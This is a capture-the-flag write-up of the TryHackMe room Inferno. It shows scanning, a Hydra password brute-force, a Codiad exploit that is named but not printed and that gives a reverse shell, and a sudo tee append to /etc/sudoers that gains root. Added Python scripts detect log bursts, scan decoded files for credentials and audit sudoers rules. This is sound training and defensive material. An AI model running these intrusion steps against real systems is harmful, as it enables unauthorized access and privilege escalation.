TryHackMe | Inferno
I recently completed the TryHackMe room Inferno. This was a medium-rated room and I think that was a pretty accurate rating.
I started this capture-the-flag room the same as any other, with a port scan using the nmap tool.
gareth@enso:~/Desktop/Files/Inferno$ nmap -F 10.10.170.49 -oN inferno.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-13 21:28 CEST
Nmap scan report for 10.10.170.49
Host is up (0.039s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
106/tcp open  pop3pw
I could see there was a web server running on port 80, so I decided to scan for any directories that might be hidden.  My initial scan using the common.txt wordlist returned nothing of interest, so I tried again with the medium directory list.  This turned up a directory called inferno that was protected by basic authentication.
gareth@enso:~/Desktop/Files/Inferno$ gobuster dir -u http://10.10.170.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.170.49
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 21:31:58 Starting gobuster in directory enumeration mode
===============================================================
/inferno              (Status: 401) [Size: 459]
I then used Hydra to crack the password for this area, assuming the default username 'admin' was the one in use.  Luckily this assumption paid off and I gained access to the area.
gareth@enso:~/Desktop/Files/Inferno$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.170.49 http-get /inferno -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-13 21:34:33
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.170.49:80/inferno
[80][http-get] host: 10.10.170.49   login: admin   password: <redacted>
[STATUS] attack finished for 10.10.170.49 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-13 21:35:28

Codiad
I was presented with a login form for what looked like a tool called "Codiad".  I searched for an exploit for Codiad using searchsploit and found the following.
Because these exploits required the user to be authenticated, I tried reusing the credentials from the basic authentication.  This proved successful and I was able to log in.
gareth@enso:~/Desktop/Files/Inferno$ searchsploit Codiad
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities                   | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion                       | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated)      | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)  | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)  | multiple/webapps/49907.py
---------------------------------------------------------- ---------------------------------
After some trial and error with these I could not get any of them to work, so I instead decided to search GitHub and came across a repository that contained an exploit for Codiad which I managed to get working.
I was able to get a reverse-shell on the machine by following the instructions in the exploit file.
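From the defender's side, the directory enumeration and password guessing described above leave an obvious trace in the web server's access log: one client producing a burst of 404s, then a burst of 401s against the same protected path, followed by a 200 once a guess succeeds. The following Python script is an added example and not part of the original write-up: it parses combined-format access log lines and flags both bursts with a sliding window. The log lines, client IPs, user agent and thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone
from typing import Deque, Dict, List, Optional, Tuple

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect_bursts(lines: List[str], window: timedelta = timedelta(seconds=60),
                  threshold: int = 20) -> List[dict]:
    """Sliding-window burst detection over log lines in time order.

    A 401 burst is keyed per (ip, path): password guessing against one protected area.
    A later 200 from the same ip on that path marks the guess that succeeded.
    A 404 burst is keyed per ip regardless of path: directory enumeration.
    """
    buckets: Dict[Tuple[str, str, str], Deque[datetime]] = defaultdict(deque)
    alerts: Dict[Tuple[str, str, str], dict] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 401:
            key = (rec["ip"], "auth-failure", rec["path"])
        elif rec["status"] == 404:
            key = (rec["ip"], "not-found", "*")
        elif rec["status"] == 200:
            key = (rec["ip"], "auth-failure", rec["path"])
            if key in alerts:
                alerts[key]["success_after"] = True
            continue
        else:
            continue
        q = buckets[key]
        q.append(rec["time"])
        while rec["time"] - q[0] > window:  # drop failures older than the window
            q.popleft()
        if key in alerts:
            alerts[key]["count"] += 1
        elif len(q) >= threshold:
            alerts[key] = {"ip": rec["ip"], "kind": key[1], "path": key[2],
                           "count": len(q), "first_seen": q[0], "success_after": False}
    return list(alerts.values())


def build_sample_log() -> List[str]:
    """Constructed sample, not a real capture: one client enumerates directories (404s), then
    hammers /inferno/ with 401s until a 200; a second client mistypes its password once."""
    def fmt(ip: str, path: str, status: int, t: datetime) -> str:
        return f'{ip} - - [{t.strftime(TIME_FMT)}] "GET {path} HTTP/1.1" {status} 459 "-" "scanner/1.0"'
    t0 = datetime(2021, 8, 13, 21, 31, 58, tzinfo=timezone.utc)
    lines = [fmt("203.0.113.5", f"/dir{i}", 404, t0 + timedelta(seconds=i)) for i in range(30)]
    t1 = t0 + timedelta(minutes=3)
    lines += [fmt("203.0.113.5", "/inferno/", 401, t1 + timedelta(seconds=i)) for i in range(25)]
    lines.append(fmt("203.0.113.5", "/inferno/", 200, t1 + timedelta(seconds=25)))
    lines.append(fmt("198.51.100.7", "/inferno/", 401, t1))
    lines.append(fmt("198.51.100.7", "/inferno/", 200, t1 + timedelta(seconds=5)))
    return lines


if __name__ == "__main__":
    for alert in detect_bursts(build_sample_log()):
        print(alert)
```

The single mistyped password from the second client never reaches the threshold, so it produces no alert; the scanner produces one alert per kind of burst, and the auth-failure alert carries success_after=True, which is the event worth paging on. Lowering the window or threshold trades false positives for earlier detection.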

Foothold
Now that I had a foothold on the server, it was time to enumerate.  I eventually found an interesting file in the /home/dante/Downloads directory called .download.dat, which contained what looked like hexadecimal-encoded data.  I used CyberChef to convert this hexadecimal to ASCII and was presented with the following:
«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.
«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.
Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.
Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».
dante:<redacted>
With the credentials at the bottom I was able to access the server via SSH as the dante user and capture the user flag, which was in the local.txt file in the home directory.
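The hex-to-ASCII step done in CyberChef above can be reproduced with a few lines of Python. The following is an added example, not code from the original write-up: it strips whitespace, decodes the hex as UTF-8 (so the accented Italian text survives intact), and then checks whether the decoded text contains a user:secret line, the same check a secrets scanner would apply to a file like .download.dat. The hex blob and the password inside it are constructed placeholders, not the room's real values.

```python
import re
from typing import Optional, Tuple

# Constructed sample: the hex of "«Vedi la bestia»\ndante:example-pw\n", grouped and wrapped
# the way a dumped file often is. Not the real file contents; the real password is redacted above.
SAMPLE_HEX = """
c2ab 5665 6469 206c 6120 6265 7374 6961 c2bb 0a
6461 6e74 653a 6578 616d 706c 652d 7077 0a
"""

# A line shaped like user:secret, with a conventional Unix username on the left.
CRED_LINE = re.compile(r"^([A-Za-z_][A-Za-z0-9_-]{0,31}):(\S+)$")


def decode_hex_blob(blob: str) -> str:
    """Drop all whitespace, then decode the hex digits as UTF-8 (CyberChef's 'From Hex')."""
    cleaned = re.sub(r"\s+", "", blob)
    if len(cleaned) % 2:
        raise ValueError("odd number of hex digits: input is truncated or not hex")
    return bytes.fromhex(cleaned).decode("utf-8")


def find_credential_line(text: str) -> Optional[Tuple[str, str]]:
    """Return (user, secret) for the first user:secret line in the text, else None."""
    for line in text.splitlines():
        m = CRED_LINE.match(line.strip())
        if m:
            return m.group(1), m.group(2)
    return None


if __name__ == "__main__":
    decoded = decode_hex_blob(SAMPLE_HEX)
    print(decoded)
    hit = find_credential_line(decoded)
    print("credential-looking line found for user:", hit[0] if hit else None)
```

On a real host the same two functions run over every file in a user's home would have flagged .download.dat as a plaintext credential store; the hex wrapper hides nothing from a scanner that decodes before matching.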
gareth@enso:~/Desktop/Files/Inferno$ ssh dante@10.10.170.49
dante@10.10.170.49's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
  System information as of Fri Aug 13 20:11:10 UTC 2021
  System load:  0.0               Processes:           1198
  Usage of /:   42.0% of 8.79GB   Users logged in:     0
  Memory usage: 61%               IP address for eth0: 10.10.170.49
  Swap usage:   0%
39 packages can be updated.
0 updates are security updates.
Last login: Fri Aug 13 20:10:56 2021 from 10.8.145.210
dante@Inferno:~$ cat local.txt

Privilege Escalation
From running the command sudo -l I could see that the dante user has permission to run the tee command as root via sudo, without a password.  
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
A quick check on GTFOBins showed me how this command can be used to gain write access to any file on the file system.
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"
I used this to append a line to the /etc/sudoers file allowing the dante user to run any command as root without a password.  From there I was able to spawn a root shell and capture the root flag.
dante@Inferno:~$ LFILE=/etc/sudoers
dante@Inferno:~$ echo "dante ALL=(root) NOPASSWD: ALL" | sudo tee -a "$LFILE"
dante ALL=(root) NOPASSWD: ALL
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
    (root) NOPASSWD: ALL
dante@Inferno:~$ sudo su
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
Congrats!
You've rooted Inferno!
<redacted>
mindsflee
root@Inferno:~#

Summary
This room took a bit of time to gain a foothold on, because I was not familiar with Codiad and spent a lot of time trying to find an exploit for it that actually worked.  The reverse shell gained from the exploit found on GitHub was a bit flaky, so I had to enumerate quickly.  I was thankful this room contained a step where I obtained the SSH user password so I could get a more stable connection.
Thankfully the privilege escalation on this one was quite straightforward, thanks to some poor configuration on the server and the great resource that is GTFOBins.
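The "poor configuration" the summary refers to is the sudo rule, and it is the kind of thing a configuration audit catches before anyone else does. The following Python script is an added example, not part of the original write-up: it parses sudoers-style rules, flags NOPASSWD grants of ALL and of /usr/bin/tee with unconstrained arguments (the two rules seen on the box), and lets a rule whose arguments are pinned pass. The sample rules are constructed, and the list of file-writing binaries is an assumption seeded only with tee.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# Sudoers rule: user host=(runas) [TAG:...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
TAG_RE = re.compile(r"^([A-Z]+):\s*")

# Binaries that can write arbitrary files when run as root. Assumption: seeded only with tee,
# the one used in this room; extend from GTFOBins' file-write category for a real audit.
FILE_WRITERS: Set[str] = {"/usr/bin/tee"}


@dataclass
class Finding:
    rule: str
    severity: str
    reason: str


def parse_rule(line: str) -> Optional[Tuple[str, str, str, List[Tuple[Set[str], str]]]]:
    """Split one rule into (user, host, runas, [(tags, command), ...]); None if not a rule."""
    m = RULE_RE.match(line)
    if not m:
        return None
    cmds: List[Tuple[Set[str], str]] = []
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        tags: Set[str] = set()
        t = TAG_RE.match(spec)
        while t:  # peel off NOPASSWD:, SETENV: and similar tags
            tags.add(t.group(1))
            spec = spec[t.end():]
            t = TAG_RE.match(spec)
        cmds.append((tags, spec))
    return m.group("user"), m.group("host"), m.group("runas") or "root", cmds


def audit_sudoers(text: str) -> List[Finding]:
    """Flag rules that hand a non-root user root directly (ALL) or via an unconstrained file write."""
    findings: List[Finding] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        parsed = parse_rule(line)
        if parsed is None or parsed[0] == "root":
            continue
        user, _host, runas, cmds = parsed
        for tags, cmd in cmds:
            nopasswd = "NOPASSWD" in tags
            if cmd == "ALL":
                findings.append(Finding(line, "critical" if nopasswd else "high",
                    f"{user} may run any command as {runas}"
                    + (" without a password" if nopasswd else "")))
                continue
            parts = cmd.split()
            if parts and parts[0] in FILE_WRITERS and len(parts) == 1:
                findings.append(Finding(line, "high",
                    f"{parts[0]} as {runas} with unconstrained arguments lets {user} write any file "
                    f"(including /etc/sudoers); pin the arguments or drop the rule"))
    return findings


# Constructed sample resembling the box's sudoers before and after the change made above,
# plus a pinned-argument rule that should pass.
SAMPLE_SUDOERS = """
Defaults env_reset
root ALL=(ALL:ALL) ALL
dante ALL=(root) NOPASSWD: /usr/bin/tee
dante ALL=(root) NOPASSWD: ALL
www-data ALL=(root) NOPASSWD: /usr/bin/tee -a /var/log/app.log
"""

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{f.severity}] {f.rule}\n    {f.reason}")
```

Run against a live system, the input would be the contents of /etc/sudoers and /etc/sudoers.d/* (as root, or via visudo -c -f for syntax checking first). The www-data rule passes because sudo matches the listed arguments exactly, so tee can only ever append to that one log file; that is the shape the dante rule should have had. Negated commands (!) and aliases (Cmnd_Alias) are not handled here and would need to be expanded before auditing.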